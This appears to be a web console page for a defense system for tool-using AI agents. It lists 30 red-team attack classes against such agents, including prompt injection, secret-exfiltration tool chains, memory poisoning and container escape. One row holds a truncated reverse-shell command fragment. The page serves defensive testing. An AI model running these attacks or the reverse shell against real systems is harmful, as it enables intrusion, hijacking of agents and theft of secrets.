Agentic Defense Matrix (ADM) is a defense-in-depth system for AI agents that can plan tasks and call tools. Instead of relying only on prompt filtering, it watches what agents actually do — at the API gateway, the policy engine, and the operating-system level — and contains the blast radius when something goes wrong.
This console shows a live security exercise running on the deployed system:
Every event is logged to a database and scored, so you can see in real time how well the defenses hold. The scoreboard below updates every few seconds; the feed on the left streams each attack and defense as it happens.
These 30 rows are the base attack classes. At runtime the red team deterministically expands them into 10,000 enumerated campaign variants (RT-00001 … RT-10000). On a landing, adaptive LLM mutation can append follow-up steps to an attack chain. Browse all 10,000 variants ›
| ID | Attack | Technique |
|---|---|---|
| RT-001 | Prompt Injection | Indirect injection via RAG context |
| RT-002 | Tool Chaining | read_secret → external_send chain |
| RT-003 | RAG Poisoning | Inject malicious URLs into knowledge base |
| RT-004 | Reverse Shell | bash -i >& /dev/tcp/... via tool call |
| RT-005 | Confused Deputy | Trick agent into privilege escalation |
| RT-006 | Token Theft | Replay captured JWT |
| RT-007 | Egress Exfiltration | DNS tunnel / HTTP POST to external |
| RT-008 | Container Escape | Mount host filesystem attempts |
| RT-009 | Rate Abuse | 1000 req/min automated probing |
| RT-010 | State Drift | Modify agent context mid-session |
| RT-011 | LLM Supply Chain | Compromised Ollama model |
| RT-012 | Log Injection | Crafted payloads in user input |
| RT-013 | TOCTOU Race | Race condition in policy check |
| RT-014 | DNS Rebinding | Bypass egress filter via DNS |
| RT-015 | Privilege Escalation | Exploit Watchdog → root |
| RT-016 | Indirect Tool Output | Inject malicious instructions in tool output |
| RT-017 | Multi-Turn Context | Build trust then exploit across turns |
| RT-018 | Encoding Injection | Base64/hex encoded payloads |
| RT-019 | Multi-Language | Injection in multiple languages |
| RT-020 | Nested Injection | Nested system/user/assistant markers |
| RT-021 | Social Engineering | Fake admin/emergency commands |
| RT-022 | Payload Obfuscation | Variable splitting, concatenation |
| RT-023 | Supply Chain | Malicious package installation |
| RT-024 | Time-Based | Delayed trigger injection |
| RT-025 | Resource Exhaustion | Large payloads, concurrent requests |
| RT-026 | Memory Poisoning | Poison agent conversation memory |
| RT-027 | Cross-Session | Contaminate other sessions |
| RT-028 | Token Extraction | Extract API keys/tokens |
| RT-029 | Denial of Service | Excessive token generation |
| RT-030 | Side Channel | Data exfiltration via encoding |